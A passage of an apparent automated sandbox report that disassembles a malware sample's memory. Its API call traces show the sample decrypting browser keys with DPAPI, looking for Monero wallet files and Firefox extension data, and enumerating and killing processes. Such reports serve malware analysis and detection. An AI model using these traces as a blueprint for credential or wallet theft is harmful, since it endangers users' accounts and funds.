                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocLocallstrcpy
                                • String ID: @$v10$v20
                                • API String ID: 2746078483-278772428
                                • Opcode ID: 216b03d865e9fe38dbce985a89565aeb19a9cf0ec7889c92c9d4eda626f865b4
                                • Instruction ID: 59989523922d550c5867e86cff175e5188b0a037bf8fdc813800c0a81c746775
                                • Opcode Fuzzy Hash: 216b03d865e9fe38dbce985a89565aeb19a9cf0ec7889c92c9d4eda626f865b4
                                • Instruction Fuzzy Hash: 2D512974A10208ABDF14EFA4CD96FEE77B5AF45304F449028F90A7F291EB706A45CB51
                                APIs
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                  • Part of subcall function 00EAA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EAA13C
                                  • Part of subcall function 00EAA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EAA161
                                  • Part of subcall function 00EAA110: LocalAlloc.KERNEL32(00000040,?), ref: 00EAA181
                                  • Part of subcall function 00EAA110: ReadFile.KERNEL32(000000FF,?,00000000,00EA148F,00000000), ref: 00EAA1AA
                                  • Part of subcall function 00EAA110: LocalFree.KERNEL32(00EA148F), ref: 00EAA1E0
                                  • Part of subcall function 00EAA110: CloseHandle.KERNEL32(000000FF), ref: 00EAA1EA
                                  • Part of subcall function 00EB8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EB8FE2
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00EC1678,00EC0D93), ref: 00EAF64C
                                • lstrlen.KERNEL32(00000000), ref: 00EAF66B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 998311485-3310892237
                                • Opcode ID: 6f013c661a7782936a055b8dfbe63a8af1e48ee37b534a7039aaaa92728904fe
                                • Instruction ID: 70dd9f51d8c1918ddd090074c4fae3ca38d4e53ed59dd03b05cbb0f63597b38f
                                • Opcode Fuzzy Hash: 6f013c661a7782936a055b8dfbe63a8af1e48ee37b534a7039aaaa92728904fe
                                • Instruction Fuzzy Hash: C351EF72D10208ABCF04FBA4DDA6DEE77B9AF54300F489578F41677191EE346A09CB62
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 924a270fe538d3067ee28e35c928dbbefd0a49fefa1d63a6b2b7b12d9c541a04
                                • Instruction ID: 6ae37904057e764ad907a277eef259de91af596d029b21bf5fc99d66770a97be
                                • Opcode Fuzzy Hash: 924a270fe538d3067ee28e35c928dbbefd0a49fefa1d63a6b2b7b12d9c541a04
                                • Instruction Fuzzy Hash: E1414271D10209EBCF14EFA4D956EEFB7B8AF44304F049428F51576285EB709A45CFA1
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EAA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EAA13C
                                  • Part of subcall function 00EAA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EAA161
                                  • Part of subcall function 00EAA110: LocalAlloc.KERNEL32(00000040,?), ref: 00EAA181
                                  • Part of subcall function 00EAA110: ReadFile.KERNEL32(000000FF,?,00000000,00EA148F,00000000), ref: 00EAA1AA
                                  • Part of subcall function 00EAA110: LocalFree.KERNEL32(00EA148F), ref: 00EAA1E0
                                  • Part of subcall function 00EAA110: CloseHandle.KERNEL32(000000FF), ref: 00EAA1EA
                                  • Part of subcall function 00EB8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EB8FE2
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00EAA489
                                  • Part of subcall function 00EAA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00EAA23F
                                  • Part of subcall function 00EAA210: LocalAlloc.KERNEL32(00000040,?,?,?,00EA4F3E,00000000,?), ref: 00EAA251
                                  • Part of subcall function 00EAA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00EAA27A
                                  • Part of subcall function 00EAA210: LocalFree.KERNEL32(?,?,?,?,00EA4F3E,00000000,?), ref: 00EAA28F
                                  • Part of subcall function 00EAA2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00EAA2D4
                                  • Part of subcall function 00EAA2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00EAA2F3
                                  • Part of subcall function 00EAA2B0: LocalFree.KERNEL32(?), ref: 00EAA323
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: 5b359c6e73ef36f286bfb40ccc922ae9322b75ad4a970a3b420ce34c3b688ccc
                                • Instruction ID: 60303df6729c80d6899ed63d4d2992f46cdec3b23d41eb11564a7c3623cd276d
                                • Opcode Fuzzy Hash: 5b359c6e73ef36f286bfb40ccc922ae9322b75ad4a970a3b420ce34c3b688ccc
                                • Instruction Fuzzy Hash: 8A3161B6D00208ABCF04DBE4DD55EEFB3B8AF59304F085568E911B7241E731AE05CBA6
                                APIs
                                • memset.MSVCRT ref: 00EB967B
                                  • Part of subcall function 00EB8EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00EB96AE,00000000), ref: 00EB8EEB
                                  • Part of subcall function 00EB8EE0: RtlAllocateHeap.NTDLL(00000000), ref: 00EB8EF2
                                  • Part of subcall function 00EB8EE0: wsprintfW.USER32 ref: 00EB8F08
                                • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00EB973B
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EB9759
                                • CloseHandle.KERNEL32(00000000), ref: 00EB9766
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                • String ID:
                                • API String ID: 3729781310-0
                                • Opcode ID: 365c962a55604d5166bb3d1a7aeaa71e258e096d9c9c1c4dc80f70e6575c3864
                                • Instruction ID: 5e7ac33808d0ce2c1d9b409d728b34690b4e8c48f924eef0ca11bcd0d56ee047
                                • Opcode Fuzzy Hash: 365c962a55604d5166bb3d1a7aeaa71e258e096d9c9c1c4dc80f70e6575c3864
                                • Instruction Fuzzy Hash: FA317E75A00218ABDF14DFE0DD49BEEB7B8FB04700F204469F606AB288DB746A84CB51
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00EC05BF), ref: 00EB885A
                                • Process32First.KERNEL32(?,00000128), ref: 00EB886E
                                • Process32Next.KERNEL32(?,00000128), ref: 00EB8883
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                • CloseHandle.KERNEL32(?), ref: 00EB88F1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: d137c8ec4dda4db4ea310b8920615c29f955d79765d6c36f32f862eec9324be1
                                • Instruction ID: 0af990870f6d7a02859a49acec96cc6c13c078e757fbf8faa155fcaf164b5ea6
                                • Opcode Fuzzy Hash: d137c8ec4dda4db4ea310b8920615c29f955d79765d6c36f32f862eec9324be1
                                • Instruction Fuzzy Hash: 2B313C71901218ABCF28DB94DD95FEFB7B9EB44700F5451A9F11AB2290EB306A44CFA1
                                APIs
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F1FE13
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F1FE2C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Value___vcrt_
                                • String ID:
                                • API String ID: 1426506684-0
                                • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                • Instruction ID: 3856d1a519234f110fe50cc6a5c21db12153e70b3802f20d194cc9975d0ee5ee
                                • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                • Instruction Fuzzy Hash: 8201D432609731EEFA3466B4ACC9AAB3694FB117B57344339F116801F2EF564C85B284
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00EC0DE8,00000000,?), ref: 00EB7B40
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB7B47
                                • GetLocalTime.KERNEL32(?,?,?,?,?,00EC0DE8,00000000,?), ref: 00EB7B54
                                • wsprintfA.USER32 ref: 00EB7B83
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 6ed0895e54bb5bddeb03f7169ff661c1efed842079ce0b50573fd903f66a235f
                                • Instruction ID: 898f91b18777863cd594733655079e2c56098266cfc05ac4c569a85358c44caa
                                • Opcode Fuzzy Hash: 6ed0895e54bb5bddeb03f7169ff661c1efed842079ce0b50573fd903f66a235f
                                • Instruction Fuzzy Hash: 94112AB2904218ABCB14DBC9DD49BFFB7B8FB4CB11F10412AF615A2284E6395940C7B0
                                APIs
                                • __getptd.LIBCMT ref: 00EBCA7E
                                  • Part of subcall function 00EBC2A0: __amsg_exit.LIBCMT ref: 00EBC2B0
                                • __getptd.LIBCMT ref: 00EBCA95
                                • __amsg_exit.LIBCMT ref: 00EBCAA3
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00EBCAC7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: 6f4c4dbdf459ab8c9a45b0d61f871209dcd60c0d5e2f65c82713533d6357e862
                                • Instruction ID: bc5b74d1dbf24c103e3fda7301c04bed4fc26fa602de31189017498a0299994e
                                • Opcode Fuzzy Hash: 6f4c4dbdf459ab8c9a45b0d61f871209dcd60c0d5e2f65c82713533d6357e862
                                • Instruction Fuzzy Hash: 85F090329487189BD624FBA89803BCF37E0AF00724F30314AF506B62E2CBA459418AD6
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Catch
                                • String ID: MOC$RCC
                                • API String ID: 78271584-2084237596
                                • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                • Instruction ID: 28789ed646d8bd9ef8b467aebecb5e8139e951bec3565f64b642d9f41dfb3fcf
                                • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                • Instruction Fuzzy Hash: 9C415B72D00219AFDF15DF94ED82AEE7BB5FF48314F184059F90466212D7399990EF50
                                APIs
                                  • Part of subcall function 00EB8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EB8F9B
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB51CA
                                • lstrcat.KERNEL32(?,00EC1058), ref: 00EB51E7
                                • lstrcat.KERNEL32(?,01BF9FD8), ref: 00EB51FB
                                • lstrcat.KERNEL32(?,00EC105C), ref: 00EB520D
                                  • Part of subcall function 00EB4B60: wsprintfA.USER32 ref: 00EB4B7C
                                  • Part of subcall function 00EB4B60: FindFirstFileA.KERNEL32(?,?), ref: 00EB4B93
                                  • Part of subcall function 00EB4B60: StrCmpCA.SHLWAPI(?,00EC0FC4), ref: 00EB4BC1
